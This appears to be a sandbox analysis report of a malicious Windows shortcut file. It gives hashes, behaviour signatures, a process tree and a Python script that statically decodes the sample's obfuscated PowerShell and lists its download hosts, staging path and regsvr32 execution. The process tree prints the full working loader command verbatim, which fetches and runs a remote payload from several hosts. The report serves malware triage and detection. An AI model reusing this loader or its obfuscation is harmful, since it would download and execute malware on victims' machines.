Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    13-11-2024 09:40

General

  • Target

    997e6a4caf197fb6695e693d61601a9863f27d35cfb4b9953897bcac2a8fefc5.lnk

  • Size

    3KB

  • MD5

    14dc4ae011bd6703e8d3a0b094d58067

  • SHA1

    e37b85e8f6223da2bef6fa9d890f65ac483bf92b

  • SHA256

    997e6a4caf197fb6695e693d61601a9863f27d35cfb4b9953897bcac2a8fefc5

  • SHA512

    5468f1a77af30e3413ff096769a75edd1550ffe443afac003d609bd789bbacde0084795a6f94047af2ddf475b39fab53a461a2a27add9070797abef88e7ae2cd

Score
6/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs a command through powershell.exe.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\997e6a4caf197fb6695e693d61601a9863f27d35cfb4b9953897bcac2a8fefc5.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2748
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /v:on /c XxlJPJBQkT46VdMdQigOB930G4w8r3fGWLHDECTcu2Gvw/5R92JhPqlNre7LjMzY55k/aHQl||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
      2⤵
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:2596
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2548
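The process tree above is the whole story of this sample: cmd.exe is handed a junk token followed by `||` and a caret-broken `p^o^w^e^r^s^h^e^l^l.e^x^e`, and the PowerShell it launches rebuilds a base64 blob from two variables (`$ghT+$ufmV`) before handing it to `iex`. The script below is an added triage example written for this page (not part of the sandbox report and not the sample author's code): it undoes both layers statically, without running anything, and pulls out the download URLs, the staging directory, the dropped file name and the regsvr32 target. The command line is copied verbatim from PID 2596; the only assumption is the user's %TMP% path, which is inferred from the .lnk path shown for PID 2748 and used only to show where `$env:TMP\..` actually resolves.

```python
"""Static triage of the cmd.exe -> powershell.exe chain in the process tree.

Added example, not part of the sandbox report: it reverses the two
obfuscation layers visible in PID 2596's command line (caret escapes in the
cmd.exe token, and a base64 script split across two PowerShell variables)
and lists the indicators a responder would want, without executing anything.
"""
import base64
import ntpath
import re
from urllib.parse import urlparse

# Command line of PID 2596, copied verbatim from the report above.
CMDLINE = r'''"C:\Windows\System32\cmd.exe" /v:on /c XxlJPJBQkT46VdMdQigOB930G4w8r3fGWLHDECTcu2Gvw/5R92JhPqlNre7LjMzY55k/aHQl||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"'''

# %TMP% of the "Admin" user in this run. Assumption: inferred from the .lnk
# path C:\Users\Admin\AppData\Local\Temp\... in the report, not stated by it.
REPORTED_TMP = r"C:\Users\Admin\AppData\Local\Temp"


def strip_carets(cmdline: str) -> str:
    """Undo cmd.exe caret escaping: once cmd has parsed it, '^x' is just 'x'."""
    return re.sub(r"\^(.)", r"\1", cmdline)


def powershell_branch(cmdline: str) -> str:
    """The junk token before '||' is not a command, so it fails and cmd runs
    the right-hand side of '||'. Return that side."""
    return cmdline.rsplit("||", 1)[-1].strip()


def reassemble_base64(ps: str) -> str:
    """Resolve the $a+$b argument of FromBase64String() against the script's
    single-quoted assignments, then decode the concatenated blob."""
    assigns = dict(re.findall(r"\$(\w+)='([^']*)'", ps))
    call = re.search(r"FromBase64String\(([^)]*)\)", ps)
    if call is None:
        raise ValueError("no FromBase64String() call in script")
    names = [n.strip().lstrip("$") for n in call.group(1).split("+")]
    blob = "".join(assigns[n] for n in names)
    return base64.b64decode(blob).decode("ascii")


def extract_iocs(script: str) -> dict:
    """Pull URLs, staging directory, dropped file and regsvr32 target from
    the decoded PowerShell."""
    urls = re.findall(r'https?://[^"\s]+', script)
    dirname = re.search(r'\$t="([^"]+)"', script)
    staging = re.search(r'\$d="([^"]+)"', script)
    outfile = re.search(r"-OutFile\s+(\S+?);", script)
    regsvr = re.search(r'Regsvr32\.exe\s+"([^"]+)"', script)
    staging_dir = None
    if staging and dirname:
        staging_dir = staging.group(1).replace("$t", dirname.group(1))
    return {
        "urls": urls,
        "hosts": [urlparse(u).hostname for u in urls],
        "staging_dir": staging_dir,
        "payload_path": outfile.group(1) if outfile else None,
        "regsvr32_target": regsvr.group(1) if regsvr else None,
    }


def resolve_staging(staging_dir: str, tmp: str = REPORTED_TMP) -> str:
    """Expand $env:TMP and collapse the '..' so the real drop location shows."""
    return ntpath.normpath(staging_dir.replace("$env:TMP", tmp))


def analyze(cmdline: str = CMDLINE) -> dict:
    """Full pipeline: de-caret, take the '||' branch, decode, list indicators."""
    ps = powershell_branch(strip_carets(cmdline))
    script = reassemble_base64(ps)
    iocs = extract_iocs(script)
    iocs["resolved_staging_dir"] = resolve_staging(iocs["staging_dir"])
    return {"powershell": ps, "script": script, **iocs}


if __name__ == "__main__":
    result = analyze()
    print(result["script"])
    for key in ("hosts", "resolved_staging_dir", "payload_path", "regsvr32_target"):
        print(f"{key}: {result[key]}")
```

What the decoded script shows: six download URLs are tried in order, the first successful `Invoke-WebRequest` writes the response to `$d\IKdzfJtQpj.BCP` and the loop breaks; the empty `catch { }` means a dead host is skipped silently. `$d` is `$env:TMP\..\ZtMIjYx`, i.e. one level above %TMP% (directly under `AppData\Local` for this user), and the file is executed with `Regsvr32.exe`, so the `.BCP` extension is cosmetic: whatever is fetched has to be a DLL exporting `DllRegisterServer`. Detection points that fall out of this: cmd.exe with `/v:on` spawning PowerShell from a caret-fragmented token, PowerShell calling `FromBase64String` on concatenated variables followed by `iex`, and regsvr32.exe loading a file with a non-DLL extension from a user-writable directory.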

Network

MITRE ATT&CK Enterprise v15

Downloads

  • memory/2548-40-0x000007FEF587E000-0x000007FEF587F000-memory.dmp

    Filesize

    4KB

  • memory/2548-41-0x000000001B620000-0x000000001B902000-memory.dmp

    Filesize

    2.9MB

  • memory/2548-42-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

    Filesize

    9.6MB

  • memory/2548-44-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

    Filesize

    9.6MB

  • memory/2548-45-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

    Filesize

    9.6MB

  • memory/2548-46-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

    Filesize

    9.6MB

  • memory/2548-43-0x0000000002720000-0x0000000002728000-memory.dmp

    Filesize

    32KB

  • memory/2548-47-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

    Filesize

    9.6MB

  • memory/2548-48-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

    Filesize

    9.6MB